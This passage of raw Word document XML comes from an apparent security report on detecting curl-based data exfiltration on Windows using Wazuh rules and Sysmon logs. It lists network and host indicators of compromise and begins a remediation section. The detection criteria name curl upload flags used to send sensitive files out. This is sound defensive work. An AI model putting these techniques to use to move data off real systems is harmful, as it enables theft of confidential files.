          <w:p w14:paraId="1B59E123" w14:textId="691437B9" w:rsidR="00AD34ED" w:rsidRDefault="0CC9AE5F" w:rsidP="0CC9AE5F">
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve">  &lt;/rule&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0C800A6B" w14:textId="17058BFA" w:rsidR="00AD34ED" w:rsidRDefault="099E7C3F" w:rsidP="099E7C3F">
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
              <w:t>&lt;/group&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2160" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="03E88B82" w14:textId="453CD8E2" w:rsidR="00FD30F5" w:rsidRPr="00FD30F5" w:rsidRDefault="2BFA4357" w:rsidP="2BFA4357">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="minorHAnsi"/>
                <w:u w:val="single"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="minorHAnsi"/>
                <w:u w:val="single"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>Checks for:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7F77CCF0" w14:textId="469AF51B" w:rsidR="006C07AB" w:rsidRPr="00AC12F6" w:rsidRDefault="2BFA4357" w:rsidP="00E41785">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="25"/>
              </w:numPr>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>Execution of curl.exe</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="741F1590" w14:textId="4C8CE467" w:rsidR="006C07AB" w:rsidRPr="00AC12F6" w:rsidRDefault="2BFA4357" w:rsidP="00E41785">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="25"/>
              </w:numPr>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Suspicious command line arguments used for uploading data</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7F0F12C5" w14:textId="3AEC8E4A" w:rsidR="00B56223" w:rsidRPr="00D07CD4" w:rsidRDefault="2BFA4357" w:rsidP="00E41785">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="25"/>
              </w:numPr>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
              <w:t>HTTP or HTTPS used for outbound communication</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="271C4FBD" w14:textId="291C7477" w:rsidR="00B1604B" w:rsidRPr="00924A31" w:rsidRDefault="00B1604B" w:rsidP="2BFA4357">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="37C6FF46" w14:textId="68615844" w:rsidR="00B52402" w:rsidRPr="00FA516C" w:rsidRDefault="2BFA4357" w:rsidP="2BFA4357">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Network-Based Indicators </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Of</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Compromise (IOC):</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="4591"/>
        <w:gridCol w:w="4591"/>
      </w:tblGrid>
      <w:tr w:rsidR="001548A6" w14:paraId="6D62C2A7" w14:textId="77777777" w:rsidTr="001548A6">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4591" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5C6256BF" w14:textId="1B438800" w:rsidR="001548A6" w:rsidRPr="001548A6" w:rsidRDefault="001548A6" w:rsidP="001548A6">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Indicator</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4591" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="43A6B461" w14:textId="2A7E0723" w:rsidR="001548A6" w:rsidRPr="001548A6" w:rsidRDefault="001548A6" w:rsidP="001548A6">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Description</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001548A6" w14:paraId="678B22E6" w14:textId="77777777" w:rsidTr="001548A6">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4591" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="00D28392" w14:textId="2441AD31" w:rsidR="001548A6" w:rsidRDefault="00FA516C" w:rsidP="001548A6">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
              <w:t>HTTP POST uploads</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4591" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="270E381B" w14:textId="66EA780A" w:rsidR="001548A6" w:rsidRDefault="00A8775D" w:rsidP="001548A6">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Outbound POST request to upload data to unknown, suspicious IPs</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FA516C" w14:paraId="562D99F6" w14:textId="77777777" w:rsidTr="001548A6">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4591" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="72C63D16" w14:textId="72176430" w:rsidR="00FA516C" w:rsidRDefault="00FA516C" w:rsidP="001548A6">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
              <w:t>User Agent</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4591" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3A226FF3" w14:textId="6DAC51E7" w:rsidR="00FA516C" w:rsidRDefault="00A8775D" w:rsidP="001548A6">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve">Curl in HTTP headers shows that the upload is done using curl command line  </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FA516C" w14:paraId="67E3FE32" w14:textId="77777777" w:rsidTr="001548A6">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4591" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6B264E9A" w14:textId="55F0FD43" w:rsidR="00FA516C" w:rsidRDefault="00FA516C" w:rsidP="001548A6">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Destination</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4591" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="37A24954" w14:textId="01460457" w:rsidR="00FA516C" w:rsidRDefault="00A8775D" w:rsidP="001548A6">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Connections to unknown external IPs and ports</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6EED4C25" w14:textId="4932FF2B" w:rsidR="001548A6" w:rsidRPr="001548A6" w:rsidRDefault="001548A6" w:rsidP="2BFA4357">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6707CC3B" w14:textId="3F0FBA9C" w:rsidR="001548A6" w:rsidRDefault="001548A6" w:rsidP="2BFA4357">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="19CEDFD6" w14:textId="6874AB63" w:rsidR="6BB59A48" w:rsidRDefault="099E7C3F" w:rsidP="099E7C3F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Host-based detection focuses on the activities done on the victim machine, Windows system. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Windows Event Logs and Sysmon logs show the curl.exe process creation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D84FDC7" w14:textId="0E8BA283" w:rsidR="66A2D987" w:rsidRDefault="66A2D987" w:rsidP="66A2D987">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="63615EE9" wp14:editId="33AE4F89">
            <wp:extent cx="5829300" cy="1371600"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="513469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69905" name="Picture 513469905"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId63">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5829300" cy="1371600"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>The red boxed fields shown in the Sysmon logs above are the fields that are being checked in the Wazuh rules.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D82C375" w14:textId="6AE0A1F1" w:rsidR="00EF3FE1" w:rsidRPr="001548A6" w:rsidRDefault="2BFA4357" w:rsidP="2BFA4357">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Host-Based Indicators of Compromise (IOC):</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="4591"/>
        <w:gridCol w:w="4591"/>
      </w:tblGrid>
      <w:tr w:rsidR="001548A6" w14:paraId="37F11C72" w14:textId="77777777" w:rsidTr="001548A6">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4591" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="462EA3E9" w14:textId="7580A15E" w:rsidR="001548A6" w:rsidRPr="001548A6" w:rsidRDefault="001548A6" w:rsidP="00B8236E">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Indicator</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4591" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0652F797" w14:textId="0CBAF1E7" w:rsidR="001548A6" w:rsidRPr="001548A6" w:rsidRDefault="001548A6" w:rsidP="00B8236E">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Description</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001548A6" w14:paraId="2216C3BF" w14:textId="77777777" w:rsidTr="001548A6">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4591" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="37DD0AEB" w14:textId="1D718323" w:rsidR="001548A6" w:rsidRDefault="00FA516C" w:rsidP="00B8236E">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="minorHAnsi"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="minorHAnsi"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Process Creation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4591" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="35F8BA7B" w14:textId="5999FCD4" w:rsidR="001548A6" w:rsidRDefault="00FA516C" w:rsidP="00B8236E">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="minorHAnsi"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="minorHAnsi"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>curl.exe is executed on the system</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FA516C" w14:paraId="014855B7" w14:textId="77777777" w:rsidTr="001548A6">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4591" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6B542698" w14:textId="231822C3" w:rsidR="00FA516C" w:rsidRDefault="00FA516C" w:rsidP="00B8236E">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="minorHAnsi"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="minorHAnsi"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Command line</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4591" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="16597774" w14:textId="0C453171" w:rsidR="00FA516C" w:rsidRDefault="00FA516C" w:rsidP="00B8236E">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="minorHAnsi"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="minorHAnsi"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Sensitive file names appear with parameters like -F, files=, filename=, --form, or --upload-file which suggests attempts to attach a file and upload data.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FA516C" w14:paraId="3525AE30" w14:textId="77777777" w:rsidTr="001548A6">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4591" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="161197F1" w14:textId="0AC5B919" w:rsidR="00FA516C" w:rsidRDefault="00FA516C" w:rsidP="00B8236E">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="minorHAnsi"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="minorHAnsi"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>File access</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4591" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3BFEB2FF" w14:textId="795BBC94" w:rsidR="00FA516C" w:rsidRDefault="00FA516C" w:rsidP="00B8236E">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="minorHAnsi"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="minorHAnsi"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Sensitive confidential files accessed</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FA516C" w14:paraId="301D6410" w14:textId="77777777" w:rsidTr="001548A6">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4591" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0DD96B60" w14:textId="6F8E1402" w:rsidR="00FA516C" w:rsidRDefault="00FA516C" w:rsidP="00B8236E">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="minorHAnsi"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="minorHAnsi"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Parent processes</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4591" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="68F8E95C" w14:textId="15E60DFC" w:rsidR="00FA516C" w:rsidRDefault="00FA516C" w:rsidP="00B8236E">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="minorHAnsi"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="minorHAnsi"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Suspicious shells launched before curl</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3AB13ED1" w14:textId="48F2298F" w:rsidR="001548A6" w:rsidRDefault="001548A6" w:rsidP="2BFA4357">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="61E9D32F" w14:textId="0F89C612" w:rsidR="00B8236E" w:rsidRDefault="2BFA4357" w:rsidP="2BFA4357">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="58" w:name="_Toc220896709"/>
      <w:commentRangeStart w:id="59"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">Remediation </w:t>
      </w:r>
      <w:commentRangeEnd w:id="59"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentReference"/>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:commentReference w:id="59"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Strategies</w:t>
      </w:r>
      <w:bookmarkEnd w:id="58"/>
    </w:p>
    <w:p w14:paraId="5DC56057" w14:textId="1A7FA76B" w:rsidR="00AA46E5" w:rsidRDefault="2BFA4357" w:rsidP="2BFA4357">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">In the incident response lifecycle, after detection and analysis is CER, containment, eradication, and recovery. Containment is when identifying and isolating the main assets involved in the incident. Eradication is when removing affected components. Recovery is when restoring </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">affected systems back to normal. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D66017A" w14:textId="7CF06624" w:rsidR="00AA46E5" w:rsidRDefault="00AA46E5" w:rsidP="2BFA4357">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="55EF21BE" w14:textId="5133F723" w:rsidR="00AA46E5" w:rsidRPr="00AA46E5" w:rsidRDefault="2BFA4357" w:rsidP="2BFA4357">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Containment:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65AFABAC" w14:textId="11256347" w:rsidR="00AA46E5" w:rsidRDefault="2BFA4357" w:rsidP="00E41785">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Isolate affected systems from the network</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CBBAFAD" w14:textId="4AF003ED" w:rsidR="00CD77FA" w:rsidRDefault="001937C3" w:rsidP="00E41785">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
